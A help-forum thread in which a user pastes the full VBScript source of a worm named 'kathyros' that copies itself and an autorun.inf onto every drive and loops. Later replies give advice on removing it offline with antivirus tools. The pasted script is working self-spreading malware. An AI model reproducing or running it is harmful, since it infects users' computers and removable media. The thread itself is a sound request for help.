Member Avatar for darkglyph

hi, i recently just got infected by a script i think named kathyros. i tried deleting it but it keeps on coming back. maybe you guys could help me.
this is the inside of the script:

'kathyros v1.0
'fucker Phils
'email me if you found this :) @ kathyros@yahoo.com
'May 2007
on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\kathyros.vbs" then
isdir=true
else
a=WshShell.Run("kathyros.bat Open" ,0,False)
isdir=false
end if

For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("kathyros.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\kathyros.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
else
Of.CopyFile "kathyros.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
end if
a=WshShell.Run("kathyros.bat + "&d ,0,True)
End If
next

if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("kathyros.bat - "&dir ,0,True)
Of.CopyFile "kathyros.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
a=WshShell.Run("kathyros.bat + "&dir ,0,True)
end if

next

  • 4 Contributors
  • 4 Replies
  • 179 Views
  • 1 Month Discussion Span
  • Latest Post Latest Post by HeroOfTheDay
Member Avatar for Suspishio

A very good example of how a trojan replicates. I don't recall having seen this published for all to see. Thanks. I didn't spot anything in HJT but then I didn't put much effort into it.

Anyway, my advice (which no doubt will differ from others who may reply - but then often nobody else replies) is to get your HDD offline and deal with it other than as the boot drive.

If you have a second PC, put it into a suitable USB enclosure and boot the second PC. It won't catch the trojan.

If you don't have a second PC, buy another suitable HDD and build a minimum Windows system onto it with the AV/Antispyware tools and registry cleaners that are usually talked about on this forum. SpyBOT (TeaTimer OFF), AVF AntiSpyware, HijackThis, AWC Registry cleaner come to mind. You won't need the likes of Norton, McCaffee and the like because you'll be scanning with SpyBot and AVG several times.

Do the following first:

On the infected disk ensure that all types of file and folder are visible to you. Look for files with the name Kathyros in them; note the creation date/time and file sizes.

Look for files/folders on the infected HDD that were created around (within say 1 minute) of the dates and times you noted. They would typically be in \Windows\system32; \windows;c:\; \Program Files. But suspect anywhere! Note these files. Be meticulus about listing what you find.

If you found Kaythros.vbs, open it for editing (BE CAREFUL NOT TO ACCIDENTALLY EXECUTE IT) and note any file names or associated algorithms it is trying to establish. You'll want to keep your eye out for these files (usually EXE or DLL or BAT or INF).

Next:
Run both SpyBot and AVG on the infected drive. Compare what they find and remove with what you've listed.

Remove anything manually of the suspect kind by Delete or DEL under the CMD prompt.

Next:
When you're certain you've gotten rid of everything, make the ex-infected disk your primary disk. BOOT FROM THE WINDOWS CD 7 REPAIR YOUR WINDOWS SYSTEM.

Boot from the ex-infected HDD into Windows safe mode and run the SPybot, AVG and Registry cleaner. Check again manually that there is no recurrence at the date and time of reboot of any suspect files.

If clear, then you're ready to go.

My famous post on 3rd September (search under the mis-spelt term "Virtunonde" provides potentially valueable detail although I think there's enough above.

let us know.

Member Avatar for explodinghead75

I'm curious; would it work if you could identify and pause the processes running so they could not replicate and then delete?

Member Avatar for Suspishio

I'm curious; would it work if you could identify and pause the processes running so they could not replicate and then delete?

... because they do their dirty work at boot up. You MIGHT be able to catch it in Bootlog mode (where you can yes/no each driver) but I've tried that and it still didn't stop a spawn.

The surest way of ealing with an active trojan, particularly one that is running and can sense (if written that way) any deletions you make, is to work on the disk offline when the trojan isn't running.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.